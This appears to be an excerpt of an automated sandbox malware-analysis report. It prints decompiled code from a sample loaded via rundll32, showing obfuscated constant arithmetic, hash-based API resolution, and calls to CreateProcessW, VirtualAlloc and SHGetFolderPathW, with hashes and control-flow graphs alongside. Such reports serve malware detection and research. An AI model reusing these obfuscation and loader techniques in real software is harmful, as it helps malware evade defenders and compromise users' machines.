                                                                                                                      				_push( *(_t271 + 0x50));
                                                                                                                      				_push( *(_t271 + 0x40));
                                                                                                                      				_t243 = 0x44;
                                                                                                                      				E00361310(_t243, _t149);
                                                                                                                      				 *((intOrPtr*)(_t271 - 0x4c)) = 0x44;
                                                                                                                      				_t183 = _t271 - 0x4c; // 0x10f16291
                                                                                                                      				_t189 = _t271 - 8; // 0x10f162d5
                                                                                                                      				_t231 = E0035679C(_t268,  *(_t271 + 0xc), _t189,  *(_t271 + 0x30), _t243,  *(_t271 + 8),  *(_t271 + 0x38),  *(_t271 + 0x54),  *(_t271 + 0x48), _t243, _t183,  *(_t271 + 0x20), _t243,  *(_t271 + 0x18), _t243, _t243,  *((intOrPtr*)(_t271 + 0x70)),  *((intOrPtr*)(_t271 + 0x60))); // executed
                                                                                                                      				if(_t231 == 0) {
                                                                                                                      					_t232 = 0;
                                                                                                                      				} else {
                                                                                                                      					if(_t265 == 0) {
                                                                                                                      						E00354DAD( *(_t271 + 0x4c),  *(_t271 + 0x24),  *((intOrPtr*)(_t271 - 8)),  *(_t271 + 0x14),  *(_t271 + 0x2c));
                                                                                                                      						E00354DAD( *(_t271 + 0x10),  *(_t271 + 0x3c),  *((intOrPtr*)(_t271 - 4)),  *(_t271 + 0x34),  *(_t271 + 0x44));
                                                                                                                      					} else {
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      					}
                                                                                                                      					_t232 = 1;
                                                                                                                      				}
                                                                                                                      				return _t232;
                                                                                                                      			}


















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: a+
                                                                                                                      • API String ID: 963392458-552692850
                                                                                                                      • Opcode ID: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction ID: dcd23fe0be7efc1eff6f955ede261ea99024e41aa3b8c07a4caab150fb89552c
                                                                                                                      • Opcode Fuzzy Hash: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction Fuzzy Hash: 9CA1F172500248EFDF59CF64C94A9CE3BA2FF48348F119219FE199A260D3B6D995CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(003D78E8), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(003D78E8), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 34ea7b-34eb35 call 34cf25 call 342d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0034EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t41;
                                                                                                                      				intOrPtr* _t50;
                                                                                                                      				void* _t51;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t53;
                                                                                                                      				void* _t60;
                                                                                                                      
                                                                                                                      				_t60 = __edx;
                                                                                                                      				E0034CF25(_t41);
                                                                                                                      				_v16 = 0xd33285;
                                                                                                                      				_v16 = _v16 + 0xd9cb;
                                                                                                                      				_v16 = _v16 | 0xd94823ae;
                                                                                                                      				_v16 = _v16 ^ 0xd9d95ea2;
                                                                                                                      				_v8 = 0xf9f040;
                                                                                                                      				_v8 = _v8 ^ 0x026675a4;
                                                                                                                      				_t52 = 0x46;
                                                                                                                      				_v8 = _v8 / _t52;
                                                                                                                      				_t53 = 0x2b;
                                                                                                                      				_v8 = _v8 / _t53;
                                                                                                                      				_v8 = _v8 ^ 0x000f054e;
                                                                                                                      				_v12 = 0x255c2b;
                                                                                                                      				_v12 = _v12 ^ 0x0b9b7933;
                                                                                                                      				_v12 = _v12 + 0xffff1ebc;
                                                                                                                      				_v12 = _v12 ^ 0x0bb758ac;
                                                                                                                      				_t50 = E00342D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
                                                                                                                      				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
                                                                                                                      				return _t51;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0034EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: 396da3b9aa43eee82df5c073776729c0c3548b45f1861fe5770312c0be90ba6c
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: ED119732D00208BBDB14DEE6C94A8DFBFB5EB85310F108099F514AA210E7715B64AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 225 10001b80-10001b90 226 10001b92-10001b97 225->226 227 10001b9c-10001ba8 225->227 228 10001c9c-10001c9f 226->228 229 10001c04-10001c66 227->229 230 10001baa-10001bb5 227->230 231 10001c74-10001c91 VirtualProtect 229->231 232 10001c68-10001c71 229->232 233 10001bb7-10001bbe 230->233 234 10001bfa-10001bff 230->234 235 10001c93-10001c95 231->235 236 10001c97 231->236 232->231 237 10001bc0-10001bce 233->237 238 10001be2-10001bf4 VirtualFree 233->238 234->228 235->228 236->228 237->238 239 10001bd0-10001be0 237->239 238->234 239->234 239->238
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction ID: 18a5c97ed4e363b13208c3a7f4c71130bffb6d6a25a92aa7c7569a15449bf2a4
                                                                                                                      • Opcode Fuzzy Hash: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction Fuzzy Hash: 7141B9746001099FEB48CF58C490FA9B7B2FB88350F14C659E91A9F395D731EE41CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 254 10001a83-10001a9e call 10001990 252->254 255 10001a1d-10001a2a 252->255 256 10001b0b-10001b0e 253->256 265 10001aa0-10001aa2 254->265 266 10001aa4-10001ac9 VirtualAlloc 254->266 257 10001a2c-10001a4e VirtualAlloc 255->257 258 10001a7e 255->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->256 261->258 265->256 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->256 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 272 35679c-356863 call 34cf25 call 342d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0035679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t40;
                                                                                                                      				int _t46;
                                                                                                                      				WCHAR* _t50;
                                                                                                                      
                                                                                                                      				_push(_a64);
                                                                                                                      				_t50 = __ecx;
                                                                                                                      				_push(_a60);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a48);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t40);
                                                                                                                      				_v24 = 0x639852;
                                                                                                                      				_v20 = 0;
                                                                                                                      				_v12 = 0x9647c4;
                                                                                                                      				_v12 = _v12 + 0x4343;
                                                                                                                      				_v12 = _v12 >> 0x10;
                                                                                                                      				_v12 = _v12 ^ 0x0009af77;
                                                                                                                      				_v16 = 0x17e0ca;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x000f0fb4;
                                                                                                                      				_v8 = 0x429f7b;
                                                                                                                      				_v8 = _v8 + 0xffff27c2;
                                                                                                                      				_v8 = _v8 + 0xb08b;
                                                                                                                      				_v8 = _v8 ^ 0x004b6691;
                                                                                                                      				E00342D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
                                                                                                                      				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
                                                                                                                      				return _t46;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0035685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: 78ef1a02057fd09af68a016db5b0aa6c5cbaf613d199ca2ab50e65f5b8d3ab86
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: C121E972901248BBCF159F95CD09CDFBFB9EF99714F008148FA1466120D7B69A64DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 277 353cbb-353d40 call 342d9f ExitProcess
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00353CBB() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _t37;
                                                                                                                      
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0x868838;
                                                                                                                      				_v16 = 0xb6c7ac;
                                                                                                                      				_t37 = 0x79;
                                                                                                                      				_v16 = _v16 * 0x7d;
                                                                                                                      				_v16 = _v16 ^ 0x593c5b8b;
                                                                                                                      				_v8 = 0x23929;
                                                                                                                      				_v8 = _v8 | 0xd856564b;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 >> 1;
                                                                                                                      				_v8 = _v8 ^ 0x67f2afdd;
                                                                                                                      				_v12 = 0x42ac5b;
                                                                                                                      				_v12 = _v12 / _t37;
                                                                                                                      				_v12 = _v12 ^ 0x0009f0c4;
                                                                                                                      				E00342D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 00353D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: cef62541cdaf8434eb5169240d690ad3b1cb60fc73bc950ec841407bf7f6aa8f
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: 5501E2B6D0120CFBDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B86B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 297 35fc96-35fd28 call 34cf25 call 342d9f lstrcmpiW
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0035FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t32;
                                                                                                                      				int _t40;
                                                                                                                      				signed int _t42;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0034CF25(_t32);
                                                                                                                      				_v8 = 0x178fa1;
                                                                                                                      				_v8 = _v8 | 0x2f4d5c19;
                                                                                                                      				_v8 = _v8 + 0xda24;
                                                                                                                      				_t42 = 0x35;
                                                                                                                      				_v8 = _v8 / _t42;
                                                                                                                      				_v8 = _v8 ^ 0x00e923af;
                                                                                                                      				_v16 = 0xca5f26;
                                                                                                                      				_v16 = _v16 << 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x97c71065;
                                                                                                                      				_v12 = 0xeb54f5;
                                                                                                                      				_v12 = _v12 >> 4;
